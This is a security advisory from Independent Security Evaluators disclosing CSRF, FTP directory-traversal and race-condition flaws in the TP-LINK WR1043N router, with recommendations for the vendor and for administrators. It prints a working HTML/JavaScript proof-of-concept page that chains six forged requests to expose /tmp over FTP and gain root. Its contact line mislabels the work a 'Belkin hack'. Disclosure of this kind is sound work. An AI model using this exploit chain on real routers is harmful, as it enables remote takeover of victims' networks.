Taking over the TP-LINK WR1043N

[return to summary]

  • The WR1043N can be taken over by a remote adversary through CSRF attack.

The TP-LINK WR1043N router is susceptible to several CSRF attacks, which allow an attacker to forge HTML forms and execute actions on behalf of a legitimate user. ISE created a proof of concept that when executed by an unsuspecting device administrator, traverses the /tmp filesystem of the WR1043N and makes it an FTP share, and enables Internet access to the router's FTP server.

Like most susceptible routers, it is possible to enable remote management using CSRF against the WR1043N. However, this is not useful to an attacker, because it is not possible to reset the administrative credentials to the WR1043N without knowing the previous username and password. Instead, ISE combined cross-site request forgery, the Internet-accessible FTP server's access to the /tmp directory, and a race condition between the web interface's writing of a shell script and executing it, to obtain root shell access to the router.

Attack Requirements

  • The victim must have an active management session with the WR1043N.
  • The victim must be fooled in to performing an action (e.g., by clicking an attacker provided link), browse to a malicious or compromised site, or be the victim of a man-in-the-middle attack.

Details

All HTML forms present in the TP-LINK WR1043N are susceptible to Cross-Site Request Forgery.

The FTP server embedded in the TP-LINK WR1043N is designed to provide access only to an attached USB flash or hard drive, but a vulnerability in the web interface allows sharing of other directories (including the root file system).

After a user modifies the "Bandwidth Control Settings" using the administrative interface on the WR1043N, the interface writes a shell script to the file /tmp/wr841n/tc.sh, and executes it. A race condition exists between the web interface writing this script and executing it. A remote attacker with access to the /tmp directory using the FTP server can repeatedly upload a replacement tc.sh containing arbitrary shell commands to be run as root.

Concurrent with our research, another security researcher discovered and reported the FTP traversal vulnerability. However, that researcher did not combine the vulnerability with cross-site request forgery to develop a remote attack.

  • Vulnerable Firmware is TL-WR1043ND_V1_120405.
  • Other versions of the firmware were not tested.

Impact

A successful attack exploiting this vulnerability can give a remote adversary full control of the victim router.

Recommendations to the vendor

  • Cross-Site request forgery can be prevented by including an unpredictable token in each HTTP request submitted to the web server. At a minimum, these tokens should be unique to each user, but it is recommended that each HTML form delivered contain a unique token.
  • In addition to HTML form tokens, HTTP referer checking should be enabled.
  • Configuration pages that accept filenames from the browser should canonicalize those paths before using them, in case the path contains symbolic or hard links (including "." or "..") that would cause the router to serve a file outside of the intended directory.
  • The FTP server should be re-engineered to ensure that users cannot access files outside of the intended FTP directory, such as canonicalization or use of the "chroot" call.
  • Additional information for vendors regarding immediate and long term fixes for these issues can be found on our summary page here.

Recommendations to device administrators

  • (4/29/2013) A firmware upgrade has been provided by TP-Link.
  • Take additional preventative measures and precautions by following the steps outlined on our summary page here.

Proof of Concept

In the following proof of concept attack, we assume that a TP-LINK WR1043N device administrator with an active management session established with the router has browsed to a malicious web page. Once there, a series of automatic form submissions take place, one after the other, to the Administrator's router, from the Administrator's browser. Since the Administrator has a current session established with the TP-LINK router, the form submissions are processed.

The malicious page (Figure 1) makes six requests to the WR1043N using HTML img tags. Requests one through four share the /tmp directory over the FTP server, change the password for admin to "ise", make the FTP server Internet-accessible, and start the FTP server, respectively. Request five enables the bandwidth control option of the router; its only purpose is to ensure that request six actually causes the tc.sh file to be rerun. After request five, the attacker (presumably using a script triggered by the victim accessing the attack page) connects to the router's FTP server and continuously uploads a replacement tc.sh file containing malicious commands. Request six disables the bandwidth control option of the router. After receiving request six, due to the race condition: (1) the web interface writes a new copy of tc.sh, (2) the attacker overwrites tc.sh using FTP, and (3) the web interface executes tc.sh.

After obtaining root shell access, an attacker could perform any attack imaginable by compiling and uploading additional commands using the FTP server.


<html>
<head>
<title>TP-LINK TL-WR1043ND CSRF</title>
<!--
# TP-LINK WR1043ND CSRF, Directory Traversal, Race Condition
# Firmware: 3.13.12 Build 120405 Rel.33996n
# Discovered and Exploited By:
#  Jacob Holcomb of Independent Security Evaluators
# Re-Implemented and Race Condition Added By:
#  Jacob Thompson of Independent Security Evaluators
# CVE: Directory Traversal - CVE-2013-2644, CSRF - CVE-2013-2645
# http://infosec42.blogspot.com
# https://www.ise.io
-->
</head>
<body>
<script type="application/javascript">

// STEP 1 - Share /tmp over the FTP Server
function csrf1() {
 document.write('<img src="http://192.168.1.1/userRpm/NasFtpCfgRpm.htm?
	displayName=tmp&shareEntire=%2Ftmp%2F.&Save=Save&selPage=0&Page=1&subpage=2
		&no_use_para_just_fix_ie_sub_bug=" width="0" height="0">');
 window.setTimeout(csrf2, 1000);
}

// STEP 2 - Change FTP Admin User Password to "ise"
function csrf2() {
 document.write('CSRF2...<br>');
 document.write('<img src="http://192.168.1.1/userRpm/NasUserAdvRpm.htm?
	nas_admin_pwd=ise
	&nas_admin_confirm_pwd=ise&nas_admin_authority=1&nas_admin_ftp=1&Modify=0
	&Save=Save">');
 window.setTimeout(csrf3, 1000);
}

// STEP 3 - Enable WAN Access to FTP Server
function csrf3() {
 document.write('CSRF3...<br>');
 document.write('<img src="http://192.168.1.1/userRpm/NasFtpCfgRpm.htm?internetA=1
	&service_port=21&save=Save">');
 window.setTimeout(csrf4, 1000);
}

// STEP 4 - Start FTP Server
function csrf4() {
 document.write('CSRF4...<br>');
 document.write('<img src="http://192.168.1.1/userRpm/NasFtpCfgRpm.htm?startFtp=1"
	width="0" height="0">');
 window.setTimeout(csrf5, 1000);
}


// STEP 5 - Enable Bandwidth Control (ensures that STEP 5 will re-run tc.sh)
function csrf5() {
 document.write('CSRF5...<br>');
 document.write('<img src="http://192.168.1.1/userRpm/QoSCfgRpm.htm?QoSCtrl=1
	&userWanType=0&up_bandWidth=512&down_bandWidth=2048&Save=Save" 
	width="0" height="0">');
 document.write('<b>FTP now up and running on WAN interface.<br>');
 document.write('<b>Attacker should begin overwriting tc.sh within 
	the next 10 seconds...</b>');
  window.setTimeout(csrf6, 10000);
}

// STEP 6 - Disable Bandwidth Control (while attacker is overwriting tc.sh)
function csrf6() {
 document.write('CSRF6');
 document.write('<img src="http://192.168.1.1/userRpm/QoSCfgRpm.htm?QoSCtrl=0
	&userWanType=0&up_bandWidth=512&down_bandWidth=2048&Save=Save" 
	width="0" height="0">');
}

csrf1();
</script>
CSRF1...<br>
</body>
</html>

References

Credit

  • Discovered By: Jacob Holcomb – Security Analyst @ Independent Security Evaluators
  • Initial exploit By: Jacob Holcomb – Security Analyst @ Independent Security Evaluators
  • Exploit revised by: Jacob Thompson – Security Analyst @ Independent Security Evaluators

Contact Information

  • For more information on this particular Belkin hack, you can contact us at routers@www.ise.io
  • Alternatively, for more general information on ISE, you can reach us using contact@www.ise.io